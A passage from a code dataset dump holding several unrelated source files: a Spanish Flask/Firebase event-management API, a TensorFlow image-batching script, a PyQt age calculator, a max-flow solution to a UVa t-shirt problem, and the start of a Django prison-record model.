if (estudiante.val()[\"carnet\"] == carnet):\n base.child(\"estudiante\").child(estudiante.key()).remove()\n return jsonify({\"message\": \"El estudiante se elimino exitosamente\"})\n\n return jsonify({\"message\": \"El estudiante no existe\"})\n\n except:\n return jsonify({\"message\": \"Hubo un error al eliminar al estudiante\"})\n\n# Esta función crea una asignación para un colaborador\n@api.route('/asignar_colaborador', methods=[\"POST\"])\ndef asignar_colaborador():\n data = request.get_json()\n carnet = data[\"carnet\"]\n flag = data[\"flag\"]\n evento_id = data[\"evento_id\"]\n actividad_id = data[\"actividad_id\"]\n\n if flag == 'true':\n nueva_asignacion = {\n \"carnet\": carnet,\n \"evento_id\": evento_id,\n }\n else: \n nueva_asignacion = {\n \"carnet\": carnet,\n \"evento_id\": evento_id,\n \"actividad_id\": actividad_id\n }\n try:\n base.child(\"asignacion\").push(nueva_asignacion)\n return jsonify({\"message\": \"La asignacion asignacion se registro exitosamente\"})\n\n except:\n return jsonify({\"message\": \"Hubo un error al agregar la asignacion\"})\n\n############################################# Eventos ############################################\n\n# Esta función crea un evento\n@api.route('/crear_evento', methods=[\"POST\"])\ndef crear_evento():\n data = request.get_json()\n evento_id = data[\"evento_id\"]\n nombre = data[\"nombre\"]\n fecha_inicio = data[\"fecha_inicio\"]\n fecha_fin = data[\"fecha_fin\"]\n asociacion_id = data[\"asociacion_id\"]\n capacidad = data[\"capacidad\"]\n descripcion = 
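The student routes above answer HTTP 200 with a generic message even when the bare `except:` fires. A sketch of the same lookup with the exception surfaced and a proper status code; the route name is hypothetical to avoid clashing with the record's:

```python
@api.route("/get_estudiantes_v2", methods=["POST"])
def get_estudiantes_v2():
    try:
        estudiantes = base.child("estudiante").get().val() or {}
        return jsonify(list(estudiantes.values()))
    except Exception as exc:  # narrowed from bare except; report the cause
        return jsonify({"message": f"Error querying students: {exc}"}), 500
```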
data[\"descripcion\"]\n\n nuevo_evento = {\n \"evento_id\": evento_id,\n \"nombre\": nombre,\n \"fecha_inicio\": fecha_inicio,\n \"fecha_fin\": fecha_fin,\n \"asociacion_id\": asociacion_id,\n \"capacidad\": capacidad,\n \"descripcion\": descripcion\n }\n\n try:\n # Validates if the event has already been registered\n eventos = base.child(\"evento\").get()\n for evento in eventos.each():\n print(evento.val()[\"evento_id\"])\n if (evento.val()[\"evento_id\"] == evento_id):\n return jsonify({\"message\": \"Este evento ya ha sido registrado\"})\n\n base.child(\"evento\").push(nuevo_evento)\n return jsonify({\"message\": \"El evento se registro exitosamente\"})\n\n except:\n return jsonify({\"message\": \"Hubo un error al agregar al evento\"})\n\n# Esta función es un get de los eventos\n@api.route('/get_eventos', methods=[\"POST\"])\ndef get_eventos():\n try:\n eventos = base.child(\"evento\").get().val()\n lista_eventos = list(eventos.values())\n return jsonify(lista_eventos)\n\n except:\n return jsonify({\"message\": \"Hubo un error al consultar los eventos\"})\n\n# Esta función es un update de los eventos\n@api.route('/update_evento', methods=[\"POST\"])\ndef update_evento():\n data = request.get_json()\n evento_id = data[\"evento_id\"]\n nombre = data[\"nombre\"]\n fecha_inicio = data[\"fecha_inicio\"]\n fecha_fin = data[\"fecha_fin\"]\n asociacion_id = data[\"asociacion_id\"]\n capacidad = data[\"capacidad\"]\n descripcion = data[\"descripcion\"]\n\n nuevo_evento = {\n \"data\": data,\n \"evento_id\": evento_id,\n \"nombre\": nombre,\n \"fecha_inicio\": fecha_inicio,\n \"fecha_fin\": fecha_fin,\n \"asociacion_id\": asociacion_id,\n \"capacidad\": capacidad,\n \"descripcion\": descripcion\n }\n\n try:\n eventos = base.child(\"evento\").get()\n for evento in eventos.each():\n print(evento.val()[\"evento_id\"])\n if (evento.val()[\"evento_id\"] == evento_id):\n if (nombre != \"\"):\n base.child(\"evento\").child(\n evento.key()).update({\"nombre\": nombre})\n if (fecha_inicio != \"\"):\n base.child(\"evento\").child(evento.key()).update(\n {\"fecha_inicio\": fecha_inicio})\n if (fecha_fin != \"\"):\n base.child(\"evento\").child(evento.key()).update(\n {\"fecha_fin\": fecha_fin})\n if (asociacion_id != \"\"):\n base.child(\"evento\").child(evento.key()).update(\n {\"asociacion_id\": asociacion_id})\n if (capacidad != \"\"):\n base.child(\"evento\").child(evento.key()).update(\n {\"capacidad\": capacidad})\n if (descripcion != \"\"):\n base.child(\"evento\").child(evento.key()).update(\n {\"descripcion\": descripcion})\n message = \"Se modificó el evento: \"\n message = message + nombre\n enviarCorreoATodos(message.encode('utf-8'))\n return jsonify({\"message\": \"El evento se edito exitosamente\"})\n\n return jsonify({\"message\": \"Este evento no se ha encontrado\"})\n\n except:\n return jsonify({\"message\": \"Hubo un error al editar al evento\"})\n\n# Esta función elimina un evento\n@api.route('/delete_evento', methods=[\"POST\"])\ndef delete_evento():\n data = request.get_json()\n evento_id = data[\"evento_id\"]\n\n try:\n eventos = base.child(\"evento\").get()\n for evento in eventos.each():\n if (evento.val()[\"evento_id\"] == evento_id):\n base.child(\"evento\").child(evento.key()).remove()\n return jsonify({\"message\": \"El evento se elimino exitosamente\"})\n\n return jsonify({\"message\": \"El evento no existe\"})\n\n except:\n return jsonify({\"message\": \"Hubo un error al eliminar al evento\"})\n\n# Esta función es un update de los eventos\n@api.route('/update_capacidad', 
methods=[\"POST\"])\ndef update_capacidad():\n data = request.get_json()\n evento_id = data[\"evento_id\"]\n capacidad = data[\"capacidad\"]\n\n nuevo_evento = {\n \"data\": data,\n \"evento_id\": evento_id,\n \"capacidad\": capacidad\n }\n\n try:\n eventos = base.child(\"evento\").get()\n for evento in eventos.each():\n print(evento.val()[\"evento_id\"])\n if (evento.val()[\"evento_id\"] == evento_id):\n if (capacidad != \"\"):\n base.child(\"evento\").child(evento.key()).update(\n {\"capacidad\": capacidad})\n return jsonify({\"message\": \"El evento se edito exitosamente\"})\n\n return jsonify({\"message\": \"Este evento no se ha encontrado\"})\n\n except:\n return jsonify({\"message\": \"Hubo un error al editar al evento\"})\n\n# Crea un nuevo interes\n@api.route('/marcar_interes', methods=[\"POST\"])\ndef marcar_interes():\n data = request.get_json()\n\n evento_id = data[\"evento_id\"]\n correo = data[\"correo\"]\n\n nuevo_interes = {\n \"evento_id\": evento_id,\n \"correo\": correo\n }\n\n try:\n # Validates if the event has already been registered\n intereses = base.child(\"interes\").get()\n\n base.child(\"interes\").push(nuevo_interes)\n return jsonify({\"message\": \"El interes se registro exitosamente\"})\n\n except:\n return jsonify({\"message\": \"Hubo un error al agregar el interes\"})\n\n#Retorna todos los intereses\n@api.route('/get_intereses', methods=[\"POST\"])\ndef get_interes():\n try:\n intereses = base.child(\"interes\").get().val()\n lista_intereses = list(intereses.values())\n return jsonify(lista_intereses)\n\n except:\n return jsonify({\"message\": \"Hubo un error al consultar los intereses\"})\n############################################# Actividades ############################################\n\n# Esta función crea una nueva actividad\n@api.route('/crear_actividad', methods=[\"POST\"])\ndef crear_actividad():\n data = request.get_json()\n evento_id = data[\"evento_id\"]\n actividad_id = data[\"actividad_id\"]\n nombre = data[\"nombre\"]\n fecha = data[\"fecha\"]\n hora_inicio = data[\"hora_inicio\"]\n hora_fin = data[\"hora_fin\"]\n descripcion = data[\"descripcion\"]\n\n nueva_actividad = {\n \"evento_id\": evento_id,\n \"actividad_id\": actividad_id,\n \"nombre\": nombre,\n \"fecha\": fecha,\n \"hora_inicio\": hora_inicio,\n \"hora_fin\": hora_fin,\n \"descripcion\": descripcion\n }\n\n try:\n # Validates if the activity has already been registered\n eventos = base.child(\"evento\").get()\n actividades = base.child(\"actividad\").get()\n for evento in eventos.each():\n print(evento.val()[\"evento_id\"])\n if (evento.val()[\"evento_id\"] == evento_id):\n\n for actividad in actividades.each():\n if (actividad.val()[\"actividad_id\"] == actividad_id): \n return jsonify({\"message\": \"La actividad ya existe\"})\n \n base.child(\"actividad\").push(nueva_actividad)\n return jsonify({\"message\": \"La actividad se registro exitosamente\"})\n\n return jsonify({\"message\": \"El evento no existe\"})\n \n\n except:\n return jsonify({\"message\": \"Hubo un error al agregar la actividad\"})\n\n# Get de las actividades\n@api.route('/get_actividades', methods=[\"POST\"])\ndef get_actividades():\n try:\n actividades = base.child(\"actividad\").get().val()\n lista_actividades = list(actividades.values())\n return jsonify(lista_actividades)\n\n except:\n return jsonify({\"message\": \"Hubo un error al consultar las actividades\"})\n\n# Esta función es un update de las actividades\n@api.route('/update_actividad', methods=[\"POST\"])\ndef update_actividad():\n data = 
\n\n# This endpoint updates an activity\n@api.route('/update_actividad', methods=[\"POST\"])\ndef update_actividad():\n    data = request.get_json()\n    evento_id = data[\"evento_id\"]\n    actividad_id = data[\"actividad_id\"]\n    nombre = data[\"nombre\"]\n    fecha = data[\"fecha\"]\n    hora_inicio = data[\"hora_inicio\"]\n    hora_fin = data[\"hora_fin\"]\n    descripcion = data[\"descripcion\"]\n\n    try:\n        actividades = base.child(\"actividad\").get()\n        for actividad in actividades.each():\n            if ((actividad.val()[\"evento_id\"] == evento_id) and (actividad.val()[\"actividad_id\"] == actividad_id)):\n                if (nombre != \"\"):\n                    base.child(\"actividad\").child(\n                        actividad.key()).update({\"nombre\": nombre})\n                if (fecha != \"\"):\n                    base.child(\"actividad\").child(actividad.key()).update(\n                        {\"fecha\": fecha})\n                if (hora_inicio != \"\"):\n                    base.child(\"actividad\").child(actividad.key()).update(\n                        {\"hora_inicio\": hora_inicio})\n                if (hora_fin != \"\"):\n                    base.child(\"actividad\").child(actividad.key()).update(\n                        {\"hora_fin\": hora_fin})\n                if (descripcion != \"\"):\n                    base.child(\"actividad\").child(actividad.key()).update(\n                        {\"descripcion\": descripcion})\n\n                return jsonify({\"message\": \"La actividad se edito exitosamente\"})\n\n        return jsonify({\"message\": \"La actividad no se ha encontrado\"})\n\n    except Exception:\n        return jsonify({\"message\": \"Hubo un error al editar la actividad\"})\n\n\n# This endpoint deletes an activity\n@api.route('/delete_actividad', methods=[\"POST\"])\ndef delete_actividad():\n    data = request.get_json()\n    evento_id = data[\"evento_id\"]\n    actividad_id = data[\"actividad_id\"]\n\n    try:\n        actividades = base.child(\"actividad\").get()\n        for actividad in actividades.each():\n            if ((actividad.val()[\"evento_id\"] == evento_id) and (actividad.val()[\"actividad_id\"] == actividad_id)):\n                base.child(\"actividad\").child(actividad.key()).remove()\n                return jsonify({\"message\": \"La actividad se elimino exitosamente\"})\n\n        return jsonify({\"message\": \"La actividad no existe\"})\n\n    except Exception:\n        return jsonify({\"message\": \"Hubo un error al eliminar la actividad\"})
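A sketch of a client call against the activity endpoints above; the base URL is an assumption, and the empty strings illustrate the convention the handlers use to leave a field untouched:

import requests  # hypothetical client-side usage, not part of the API module

r = requests.post(
    "http://localhost:5000/update_actividad",
    json={"evento_id": "42", "actividad_id": "3", "nombre": "Taller de robotica",
          "fecha": "", "hora_inicio": "", "hora_fin": "", "descripcion": ""},
)
print(r.json()["message"])  # only "nombre" changes; empty fields are skipped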
jsonify({\"message\": \"No hay cupos disponibles\"})\n base.child(\"evento\").child(evento.key()).update(\n {\"capacidad\": str(capacidad)})\n\n message = \"Se creó la reserva del evento: \"\n message = message + str(nueva_asignacion[\"evento_id\"])\n enviarCorreo(correo, message.encode('utf-8'))\n base.child(\"reserva\").push(nueva_asignacion)\n return jsonify({\"message\": \"La reserva se registro exitosamente\"})\n\n except:\n return jsonify({\"message\": \"Hubo un error al agregar la reserva\"})\n\n############################################ Propuestas #############################################\n#esta funcion crea una nueva propuesta\n@api.route('/enviar_propuesta', methods=[\"POST\"])\ndef enviar_propuesta():\n data = request.get_json()\n evento_id = data[\"evento_id\"]\n correo = data[\"correo\"]\n propuesta = data[\"propuesta\"]\n\n nueva_propuesta = {\n \"evento_id\": evento_id,\n \"correo\": correo,\n \"propuesta\": propuesta,\n \"es_aprobado\": \"pending\"\n }\n\n try:\n # Valida si la asociación ya fue registrada \n propuestas = base.child(\"propuesta\").get()\n j=0\n for i in propuestas.each():\n j+=1\n nueva_propuesta[\"propuesta_id\"] = str(j+1)\n base.child(\"propuesta\").push(nueva_propuesta)\n return jsonify({\"message\": \"La propuesta se envio exitosamente\"})\n\n except:\n return jsonify({\"message\": \"Hubo un error al enviar la propuesta\"})\n\n#Esta función es un get de las propuestas\n@api.route('/get_propuestas', methods=[\"POST\"])\ndef get_propuestas():\n try:\n propuestas = base.child(\"propuesta\").get().val()\n lista_propuestas = list(propuestas.values())\n return jsonify(lista_propuestas)\n\n except:\n return jsonify({\"message\": \"Hubo un error al consultar las propuestas\"})\n\n# Esta función es para decidir si se aprueba o no la proposición\n@api.route('/evaluar_propuesta', methods=[\"POST\"])\ndef evaluar_propuesta():\n data = request.get_json()\n propuesta_id = data[\"propuesta_id\"]\n es_aprobado = data[\"es_aprobado\"]\n\n nueva_asociacion = {\n \"propuesta_id\": propuesta_id,\n \"es_aprobado\": es_aprobado\n }\n print(es_aprobado)\n try:\n propuestas = base.child(\"propuesta\").get()\n for propuesta in propuestas.each():\n if (propuesta.val()[\"propuesta_id\"] == propuesta_id):\n if (es_aprobado != \"\"):\n base.child(\"propuesta\").child(propuesta.key()).update(\n {\"es_aprobado\": es_aprobado})\n print(es_aprobado)\n\n return jsonify({\"message\": \"La propuesta se actualizó exitosamente\"})\n\n return jsonify({\"message\": \"La propuesta no existe\"})\n\n except:\n return jsonify({\"message\": \"Hubo un error al actualizar la propuesta\"})\n\n############################################ Foro #############################################\n\n# Esta función es un envío de mensaje al foro\n@api.route('/enviar_mensaje', methods=[\"POST\"])\ndef enviar_mensaje():\n data = request.get_json()\n correo = data[\"correo\"]\n mensaje = data[\"mensaje\"]\n\n nuevo_mensaje = {\n \"correo\": correo,\n \"mensaje\": mensaje\n }\n\n try:\n base.child(\"mensaje\").push(nuevo_mensaje)\n return jsonify({\"message\": \"El mensaje se envio exitosamente\"})\n\n except:\n return jsonify({\"message\": \"Hubo un error al enviar el mensaje\"})\n\n\n#Esta función es un get de los mensajes\n@api.route('/get_mensajes', methods=[\"POST\"])\ndef get_mensajes():\n try:\n mensajes = base.child(\"mensaje\").get().val()\n lista_mensajes = list(mensajes.values())\n return jsonify(lista_mensajes)\n\n except:\n return jsonify({\"message\": \"Hubo un error al consultar los 
mensajes\"})\n\n############################################ Estadísticas #############################################\n# Un get de los eventos y el total de reservas que tuvieron\n# FALTA sacar los stats\n@api.route('/participacion_eventos', methods=[\"POST\"])\ndef participacion_eventos():\n try:\n lista_participacion = []\n eventos = base.child(\"evento\").get()\n reservas = base.child(\"reserva\").get()\n for evento in eventos.each():\n participacion_counter = 0\n for reserva in reservas.each():\n if reserva.val()[\"evento_id\"] == evento.val()[\"evento_id\"]:\n participacion_counter += 1\n \n participacion = {\n \"nombre\": evento.val()[\"nombre\"],\n \"total_participantes\": participacion_counter\n }\n lista_participacion.append(participacion)\n return jsonify(lista_participacion)\n\n except:\n return jsonify({\"message\": \"Hubo un error al consultar la participacion\"})\n \n#Un get de los eventos y el total de likes y dislikes que tuvieron\n#FALTA sacar los stats\n@api.route('/evaluacion_eventos', methods=[\"POST\"])\ndef evaluacion_eventos():\n try:\n lista_evaluacion = []\n eventos = base.child(\"evento\").get()\n feedbacks = base.child(\"feedback\").get()\n for evento in eventos.each():\n like_counter = 0\n dislike_counter = 0\n\n for feedback in feedbacks.each():\n if feedback.val()[\"evento_id\"] == evento.val()[\"evento_id\"]:\n if feedback.val()[\"is_like\"] ==\"true\":\n like_counter += 1\n else:\n dislike_counter += 1\n\n evaluacion = {\n \"nombre\": evento.val()[\"nombre\"],\n \"total_likes\": like_counter,\n \"total_dislikes\": dislike_counter\n }\n lista_evaluacion.append(evaluacion)\n return jsonify(lista_evaluacion)\n\n except:\n return jsonify({\"message\": \"Hubo un error al consultar la participacion\"})\n\n\n############################################ Feedback #############################################\n\n@api.route('/enviar_feedback', methods=[\"POST\"])\ndef enviar_feedback():\n data = request.get_json()\n correo = data[\"correo\"]\n mensaje = data[\"mensaje\"]\n is_like = data[\"is_like\"]\n evento_id = data[\"evento_id\"]\n\n\n nuevo_feedback = {\n \"correo\": correo,\n \"is_like\": is_like,\n \"evento_id\": evento_id,\n \"mensaje\": mensaje\n }\n\n try:\n base.child(\"feedback\").push(nuevo_feedback)\n return jsonify({\"message\": \"El feedback se envio exitosamente\"})\n\n except:\n return jsonify({\"message\": \"Hubo un error al enviar el feedback\"})\n\n#Esta función es un get de los feedback\n@api.route('/get_feedbacks', methods=[\"POST\"])\ndef get_feedbacks():\n try:\n feedbacks = base.child(\"feedback\").get().val()\n lista_feedbacks = list(feedbacks.values())\n return jsonify(lista_feedbacks)\n\n except:\n return jsonify({\"message\": \"Hubo un error al consultar los feedbacks\"})\n\n\n\n@api.route(\"/\")\ndef hello():\n return \"Welcome to Eventos-Tec\"\n\n\nif __name__ == \"__main__\":\n api.run(debug=True)\n","repo_name":"notthatdood/Eventos-Tec","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":30222,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"30845435183","text":"# 读取是【线程】和【队列】合作的流程\n# 主线程执行main,子线程执行def\n\nimport tensorflow as tf\nimport os\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\n\ndef picread(file_list):\n \"\"\"\n 读取狗【图片数据】到【张量】\n :param file_list: 路径+文件名的列表,(是一个1阶张量)\n \"\"\"\n # 1. 构造文件队列(包括路径+文件名)\n file_queue = tf.train.string_input_producer(file_list)\n\n # 2. 
{"seq_id":"30845435183","text":"# Reading images is a cooperation between [threads] and [queues]\n# The main thread runs main; the child threads run the reader ops\n\nimport tensorflow as tf\nimport os\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\n\ndef picread(file_list):\n    \"\"\"\n    Read the dog [image data] into [tensors]\n    :param file_list: list of path+filename strings (a rank-1 tensor)\n    \"\"\"\n    # 1. Build the file queue (path + filename)\n    file_queue = tf.train.string_input_producer(file_list)\n\n    # 2. Use an [image reader] to [read] from the file queue\n    reader = tf.WholeFileReader()  # construct an image-reader instance\n    # Reads one image at a time by default; the value has no static shape\n    key, value = reader.read(file_queue)\n    # Output: Tensor(\"ReaderReadV2:1\", shape=(), dtype=string)\n\n    # 3. Decode the image data; shape goes from () to (?, ?, ?) and dtype from string to uint8\n    image = tf.image.decode_jpeg(value)\n    # Output: Tensor(\"DecodeJpeg:0\", shape=(?, ?, ?), dtype=uint8)\n\n    # The shape must be fixed before batching; (?, ?, ?) is not allowed\n    # 4. Fix the image shape and size (make all samples uniform); training requires every sample to have the same number of features\n    # Resize to 200*200 ==> [200, 200]\n    image_resize = tf.image.resize_images(image, [200, 200])\n    # Output: Tensor(..., shape=(200, 200, ?), dtype=float32)\n\n    # 4.1 Pin the static shape to 3 channels\n    image_resize.set_shape([200,200,3])\n    # print(image_resize)\n    # Output: Tensor(..., shape=(200, 200, 3), dtype=float32)\n\n    # 5. Batch the images\n    # [image_resize]: a list containing the tensors\n    # batch_size: how many items to take\n    # capacity: size of the queue\n    image_batch = tf.train.batch([image_resize], batch_size=10, num_threads=1,capacity=10)\n\n    return image_batch\n\nif __name__ == '__main__':\n    # Stage one: build the file queue\n    # Directory containing the files to read\n    file_name = os.listdir(\"./testA/\")  # returns only the file names, not full paths\n    # Join directory + filename and keep the results in a list\n    file_list = [os.path.join(\"./testA/\", file) for file in file_name]\n    # print(file_list)\n\n    image_batch = picread(file_list)\n    # A 4-D tensor: Tensor(\"batch:0\", shape=(10, 200, 200, 3), dtype=float32)\n\n    # Print the images\n    with tf.Session() as sess:\n\n        # Create a coordinator for reclaiming the threads\n        coord = tf.train.Coordinator()\n\n        # The child threads that fill the batch queue must be started manually\n        threads = tf.train.start_queue_runners(sess=sess,coord=coord)\n\n        print(sess.run(image_batch))\n\n        # Reclaim the threads\n        coord.request_stop()\n        coord.join(threads)\n","repo_name":"BrucePython/Deep_Learning","sub_path":"05_Deep_Learning/20_图片读取流程.py","file_name":"20_图片读取流程.py","file_ext":"py","file_size_in_byte":2589,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"}
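The record above uses the TF1 queue-runner idiom. A sketch of the same read, decode, resize, and batch pipeline with the tf.data API that replaced it in TF 2.x (same ./testA/ directory assumption; no coordinator or manual threads needed):

import os
import tensorflow as tf

def make_dataset(file_list, batch_size=10):
    def load(path):
        image = tf.io.decode_jpeg(tf.io.read_file(path))
        image = tf.image.resize(image, [200, 200])
        image.set_shape([200, 200, 3])
        return image
    # map() parallelism replaces the queue runners of the TF1 version.
    return (tf.data.Dataset.from_tensor_slices(file_list)
            .map(load, num_parallel_calls=tf.data.AUTOTUNE)
            .batch(batch_size))

file_list = [os.path.join("./testA/", f) for f in os.listdir("./testA/")]
for image_batch in make_dataset(file_list):
    print(image_batch.shape)  # e.g. (10, 200, 200, 3) for full batches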
{"seq_id":"40426671741","text":"# Show a person's age based on the year they were born.\nimport sys\nfrom PyQt5 import uic, QtWidgets\n\nqtCreatorFile = \"Edad.ui\"  # Name of the Qt Designer file here.\n\nUi_MainWindow, QtBaseClass = uic.loadUiType(qtCreatorFile)\n\nclass MyApp(QtWidgets.QMainWindow, Ui_MainWindow):\n    def __init__(self):\n        QtWidgets.QMainWindow.__init__(self)\n        Ui_MainWindow.__init__(self)\n        self.setupUi(self)\n        self.btnCalculo.clicked.connect(self.fn_calculo)\n        self.btnLimpiar.clicked.connect(self.fn_limpiar)\n        self.btnSalir.clicked.connect(self.fn_salir)\n\n    def fn_calculo(self):\n        # Age = current year minus birth year\n        fechaActual = int(self.txtN1.text())\n        fecha = int(self.txtN2.text())\n        edad = fechaActual - fecha\n        self.txtN3.setText(str(edad))\n\n    def fn_limpiar(self):\n        self.txtN1.setText(\"\")\n        self.txtN2.setText(\"\")\n        self.txtN3.setText(\"\")\n        self.txtN1.setFocus()\n\n    def fn_salir(self):\n        # close() is the Qt idiom for dismissing a window (destroy() is tkinter's API)\n        self.close()\n\nif __name__ == \"__main__\":\n    app = QtWidgets.QApplication(sys.argv)\n    window = MyApp()\n    window.show()\n    sys.exit(app.exec_())\n","repo_name":"ZnthA/QT_Ejercicio_semana5","sub_path":"Edad.py","file_name":"Edad.py","file_ext":"py","file_size_in_byte":1069,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"}
{"seq_id":"16101391849","text":"# This class represents a directed graph using adjacency matrix representation\n# Implementation from Geeksforgeeks.org\nclass Graph:\n\n    def __init__(self, graph):\n        self.graph = graph  # residual graph\n        self.ROW = len(graph)\n\n    def BFS(self, s, t, parent):\n\n        # Mark all the vertices as not visited\n        visited = [False]*(self.ROW)\n\n        # Create a queue for BFS\n        queue = []\n\n        # Mark the source node as visited and enqueue it\n        queue.append(s)\n        visited[s] = True\n\n        # Standard BFS loop\n        while queue:\n\n            # Dequeue a vertex from the queue\n            u = queue.pop(0)\n\n            # Get all adjacent vertices of the dequeued vertex u\n            # If an adjacent vertex has not been visited, mark it\n            # visited and enqueue it\n            for ind, val in enumerate(self.graph[u]):\n                if visited[ind] == False and val > 0:\n                    queue.append(ind)\n                    visited[ind] = True\n                    parent[ind] = u\n\n        # If we reached the sink in BFS starting from the source, return\n        # true, else false\n        return True if visited[t] else False\n\n    # Returns the maximum flow from s to t in the given graph\n    def FordFulkerson(self, source, sink):\n\n        # This array is filled by BFS to store the path\n        parent = [-1]*(self.ROW)\n\n        max_flow = 0  # There is no flow initially\n\n        # Augment the flow while there is a path from source to sink\n        while self.BFS(source, sink, parent):\n\n            # Find the minimum residual capacity of the edges along the\n            # path filled by BFS, i.e. the maximum flow through that path.\n            path_flow = float(\"Inf\")\n            s = sink\n            while(s != source):\n                path_flow = min(path_flow, self.graph[parent[s]][s])\n                s = parent[s]\n\n            # Add path flow to overall flow\n            max_flow += path_flow\n\n            # Update residual capacities of the edges and reverse edges\n            # along the path\n            v = sink\n            while(v != source):\n                u = parent[v]\n                self.graph[u][v] -= path_flow\n                self.graph[v][u] += path_flow\n                v = parent[v]\n\n        return max_flow\n\nnum_cases = int(input())\n\nfor c in range(num_cases):\n    n, m = list(map(int, input().split()))\n\n    # Node layout: 0 = source, 1..6 = shirt sizes, 7..6+m = people, dim-1 = sink\n    dim = (1 + 6 + m + 1)\n\n    graph = [[0]*dim for i in range(dim)]\n\n    # Source to t-shirts: n//6 shirts available per size\n    graph[0][1:7] = [n//6]*6\n\n    # Sizes:\n    # XS, S, M, L, XL, XXL\n    index = {\n        \"XS\": 1,\n        \"S\": 2,\n        \"M\": 3,\n        \"L\": 4,\n        \"XL\": 5,\n        \"XXL\": 6\n    }\n    for i in range(m):\n        tshirts = input().split()\n        for t in tshirts:\n            graph[index[t]][7+i] = 1\n        graph[7+i][dim-1] = 1\n\n    g = Graph(graph)\n\n    source, sink = 0, dim-1\n    max_flow = g.FordFulkerson(source, sink)\n\n    # Everyone gets a shirt only if the max flow matches the number of people\n    if max_flow == m:\n        print(\"YES\")\n    else:\n        print(\"NO\")\n","repo_name":"sajjadt/uvapy","sub_path":"graphs/p11045.py","file_name":"p11045.py","file_ext":"py","file_size_in_byte":3151,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"57"}
{"seq_id":"29434584053","text":"\"\"\"\nEditable Types\n\"\"\"\n\nfrom django.db import models\nfrom django.utils.translation import ugettext_lazy as _\n\nimport core_types.models\nimport core_types.managers\n\n\nclass Prison(core_types.models.PublishableMixin, models.Model):\n    name = models.CharField(\n        verbose_name=_('Name'),\n        max_length=255)\n\n    address = models.TextField(\n        verbose_name=_('Address'),\n        max_length=255)\n\n    dean_name = models.CharField(\n        verbose_name=_('Dean Name'),\n        max_length=255,\n        null=True,\n        blank=True)\n\n    dean_email = models.EmailField(\n        verbose_name=_('Dean E-mail'),\n        max_length=255,\n        blank=True,\n        null=True)\n\n    dean_phone = models.CharField(\n        verbose_name=_('Dean Telephone'),\n        max_length=255,\n        null=True,\n        blank=True)\n\n    capacity = models.PositiveIntegerField(\n        verbose_name=_('Capacity'),\n        null=True,\n        blank=True)\n\n    capacity_is_estimate = models.BooleanField(\n        verbose_name=_('Estimated Capacity'),\n        default=False)\n\n    latitude = models.FloatField(\n        verbose_name=_('Latitude'),\n        null=True,\n        blank=True)\n\n    longitude = models.FloatField(\n        verbose_name=_('Longitude'),\n        null=True,\n        blank=True)\n\n    opened_year = models.IntegerField(\n        verbose_name=_('Year Of Opening'),\n        null=True,\n        blank=True)\n\n    opened_month = models.IntegerField(\n        verbose_name=_('Month Of Opening'),\n        null=True,\n        blank=True)\n\n    opened_day = models.IntegerField(\n        verbose_name=_('Day Of Opening'),\n        null=True,\n        blank=True)\n\n    opened_year_fa = models.IntegerField(\n        verbose_name=_('Persian Year Of Opening'),\n        null=True,\n        blank=True)\n\n    opened_month_fa = models.IntegerField(\n        verbose_name=_('Persian Month Of Opening'),\n        null=True,\n        blank=True)\n\n    opened_day_fa = models.IntegerField(\n        verbose_name=_('Persian Day Of Opening'),\n        null=True,\n        blank=True)\n\n    ADMINISTERED_BY_CHOICES = [\n        ('moi', _('Ministry of Information')),\n        ('police', _('Police')),\n        ('irgc', _('IRGC')),\n        ('pdotj', _('Prisons Division of the Judiciary'))\n    ]\n    administered_by = models.CharField(\n        verbose_name=_('Administered By'),\n        choices=ADMINISTERED_BY_CHOICES,\n        max_length=8,\n        null=True,\n        blank=True)\n\n    physical_structure = models.TextField(\n        verbose_name=_('Physical Structure'),\n        null=True,\n        blank=True)\n\n    size_and_density = models.TextField(\n        verbose_name=_('Size And Density'),\n        null=True,\n        blank=True)\n\n    medicine_and_nutrition = models.TextField(\n        verbose_name=_('Medicine And Nutrition'),\n        null=True,\n        blank=True)\n\n    facilities = models.ManyToManyField(\n        'PrisonFacility',\n        verbose_name=_('Prison Facility'),\n        blank=True)\n\n    picture = models.ImageField(\n        verbose_name=_('Prison Picture'),\n        upload_to='prison_pics',\n        null=True,\n        blank=True)\n\n    bio = models.TextField(\n        verbose_name=_('Bio'),\n        null=True,\n        blank=True)\n\n    explanation_en = models.TextField(\n        verbose_name=_('Any extra explanation needed to be added to this '\n                       'prisoner'),\n        null=True,\n        blank=True)\n\n    explanation_fa = models.TextField(\n        verbose_name=_('Any extra explanation needed to be added to this '\n                       'prisoner'),\n        null=True,\n        blank=True)\n\n    explanation_aea_en = models.TextField(\n        verbose_name=_('Any extra explanation needed to be added to this '\n                       'prisoner'),\n        null=True,\n        blank=True)\n\n    explanation_aea_fa = models.TextField(\n        verbose_name=_('Any extra explanation needed to be added to this '\n                       'prisoner'),\n        null=True,\n        blank=True)\n\n    objects = models.Manager()\n    published_objects = core_types.managers.PublishedManager()\n\n    class Meta:\n        verbose_name = _('Prison')\n\n    def __unicode__(self):\n        return u'%s %s: %s' % (\n            type(self).__name__,\n            self.pk,\n            self.name)\n\n    # To be used to calculate prisons mistreatments\n    # def update_mistreatment(self):\n    #     \"\"\"\n    #     Update number of mistreatments for this prison\n    #     \"\"\"\n    #     from prisoners.models import PrisonerArrest, PrisonerDetention\n    #     from report.models import Report, ReportDetention\n\n    #     arrests = PrisonerArrest.published_objects.filter(\n    #         id__in=self.sentences.filter(is_published=True).values_list('arrest__id'))\n    #     self.mistreatments_count = PrisonerDetention.published_objects.filter(\n    #         arrest_id__in=arrests).aggregate(\n    #         total_mistreatments=Count('treatment'))['total_mistreatments']\n\n    #     reports = Report.published_objects.filter(\n    #         id__in=self.report_sentences.filter(is_published=True).values_list('report__id'))\n    #     self.aea_mistreatments_count = ReportDetention.published_objects.filter(\n    #         report_id__in=reports).aggregate(\n
